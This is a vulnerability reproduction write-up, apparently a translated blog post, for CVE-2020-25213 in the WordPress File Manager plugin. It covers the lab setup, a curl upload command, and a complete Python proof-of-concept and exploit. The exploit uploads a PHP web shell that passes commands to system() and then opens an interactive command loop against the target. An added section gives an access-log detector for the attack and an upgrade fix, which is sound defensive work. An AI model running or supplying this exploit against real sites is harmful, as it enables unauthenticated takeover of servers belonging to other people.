CVE-2020-25213 WordPress Remote Code Execution Vulnerability Reproduction


0x01 Vulnerability Overview

WordPress is a blogging platform written in PHP that lets you host a personal blog on a server running PHP and MySQL. Versions of its File Manager plugin (wp-file-manager) before 6.9 contain a security flaw that allows a remote attacker to upload and execute arbitrary PHP code.

0x02 Affected Versions

WordPress File Manager (wp-file-manager) plugin, versions 6.0 through 6.8

 

0x03 Environment Setup

  • phpstudy2018
  • WordPress

  https://wordpress.org/download/

  • wp-file-manager version 6.0

  https://wordpress.org/plugins/wp-file-manager/advanced/


① Run the WordPress installer

  • Installation guide:

  https://codex.wordpress.org/zh-cn:%E5%AE%89%E8%A3%85_WordPress (may require a proxy to access)

  Or search for a guide on Baidu; the steps are not repeated here.

 

  • The WordPress home page after a successful install

     

 

  • Log in to the admin dashboard and install the wp-file-manager 6.0 plugin

  http://YourIP/wordpress/wp-admin/plugin-install.php

  Once installed, the plugin appears as follows:

  http://YourIP/wordpress/wp-admin/plugins.php

  


0x04 Vulnerability Reproduction

  • Open the following URL in a browser:

  http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

  If the response contains errUnknownCmd, as shown below, the vulnerability is present

  


  • Use curl to upload a local file with a POST request:

  curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

  Contents of test.php:

  

  • Visit the uploaded file to verify

  Upload path:
  http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/files/test.php

  

 

0x05 Vulnerability POC & EXP

# -*- coding:utf-8 -*-
import json
import requests

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                  "Chrome/91.0.4472.124 Safari/537.36 "
}

url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
upfiles_path = "/wordpress/wp-content/plugins/wp-file-manager/lib/files"
payload = "?cmd="

"""
Vulnerability check 1
Test whether the response contains errUnknownCmd
"""


def Check_1(url):
    url_2 = url + url_tail
    res1 = requests.get(url=url_2, headers=headers)
    text1 = res1.text
    text2 = json.loads(text1)
    key = json.dumps(text2)  # convert the JSON back to a string
    print(text2)
    key1 = "errUnknownCmd"
    if key1 in key:
        print("疑似漏洞存在")
        Next = input("是否進一步驗證 Y or N :")
        if Next == "Y":
            Check_2(url)
    else:
        print("漏洞不存在")


"""
Vulnerability check 2
Fetch the uploaded PHP file and check that it returns the expected response
The uploaded PHP file contains: <?php phpinfo() ?>
"""


def Check_2(url):
    data = {
        'cmd': 'upload',
        'target': 'l1_',
    }
    files = {
        'upload[0]': open('phpinfo.php', 'rb'),
    }
    url_3 = url + url_tail
    res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False)
    if res.status_code == requests.codes.ok:
        # print("上傳成功!")
        d = res.json()
        p = d.get('added', [])[0].get('url')  # path of the uploaded file as reported by the connector
        Finally_url = f'{url}{p}'
        res2 = requests.get(url=Finally_url, headers=headers)
        key2 = "PHP Version"
        if key2 in res2.text:
            print("CVE-2020-25213漏洞存在! ")
            flag = input("是否進行漏洞利用 Y or N :")
            if flag == "Y":
                while 1:
                    command = input("輸入執行的命令: ")
                    if command == "exit":
                        break
                    exploit(url, command)
        else:
            print("漏洞不存在!")


"""
Exploitation
Upload a PHP file and call it to execute a command
exploit.php contains: <?php system($_GET['cmd']); ?>
"""


def exploit(url, command):
    data = {
        'cmd': 'upload',
        'target': 'l1_',
    }
    files = {
        'upload[0]': open('exploit.php', 'rb'),
    }
    url_2 = url + url_tail
    file_status = url + upfiles_path + "/exploit.php"
    res = requests.get(url=file_status, headers=headers, verify=False)
    if res.status_code == requests.codes.ok:
        # exploit.php is already on the server; call it directly
        Fin_url = file_status + payload + command
        res3 = requests.get(url=Fin_url, headers=headers)
        res3.encoding = 'gbk'
        print(res3.text)

    else:
        # not uploaded yet: upload first, then call it
        res2 = requests.post(url=url_2, headers=headers, data=data, files=files, verify=False)
        if res2.status_code == requests.codes.ok:
            # print("上傳成功!")
            d = res2.json()
            p = d.get('added', [])[0].get('url')
            url_3 = f'{url}{p}'
            Fin_url = url_3 + payload + command
            res2 = requests.get(url=Fin_url, headers=headers)
            res2.encoding = 'gbk'
            print(res2.text)


def main():
    url = input("輸入測試的URL")
    Check_1(url)


if __name__ == '__main__':
    main()

I have only just started learning to write POCs and EXPs; if anything here is wrong, corrections from the experts are welcome _(:з」∠)_
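Every step in the reproduction and in the POC above (the unauthenticated probe of connector.minimal.php, the upload POST, and the request for the dropped file under lib/files) leaves a distinctive web-server access-log entry. The following detector is an added example, not code from the original post: it assumes Apache/nginx "combined" log format and runs over constructed sample lines; the IPs, timestamps and the label names are made up.

```python
import re
from urllib.parse import urlsplit

# "combined" access-log format; only the fields the rules need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Paths involved in CVE-2020-25213 as described on this page.
CONNECTOR = "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
UPLOAD_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"


def classify(line):
    """Return a finding label for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urlsplit(m.group("path")).path  # drop the query string before matching
    if path.endswith(CONNECTOR):
        # Any direct hit on the connector bypasses WordPress auth; a POST is an upload attempt.
        return "connector-upload" if m.group("method") == "POST" else "connector-probe"
    if UPLOAD_DIR in path and path.lower().endswith(".php") and m.group("status") == "200":
        # A .php file served from lib/files with 200 means a dropped script was executed.
        return "webshell-exec"
    return None


def scan(lines):
    """Run classify() over log lines; returns (ip, label, path) for each hit."""
    hits = []
    for line in lines:
        label = classify(line)
        if label:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), label, urlsplit(m.group("path")).path))
    return hits


# Constructed sample lines (not from any real server).
SAMPLE = [
    '203.0.113.5 - - [10/Sep/2020:10:00:01 +0000] "GET /wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 79 "-" "curl/7.68.0"',
    '203.0.113.5 - - [10/Sep/2020:10:00:02 +0000] "POST /wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 212 "-" "curl/7.68.0"',
    '203.0.113.5 - - [10/Sep/2020:10:00:03 +0000] "GET /wordpress/wp-content/plugins/wp-file-manager/lib/files/test.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Sep/2020:10:00:04 +0000] "GET /wordpress/wp-admin/plugins.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The three hits from one source address within seconds (probe, upload, execution) are the sequence to alert on; a lone probe of the connector is still worth checking, since on a patched install the file should not be reachable at all.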

 

0x06 Remediation

Update the wp-file-manager plugin to version 6.9 or later

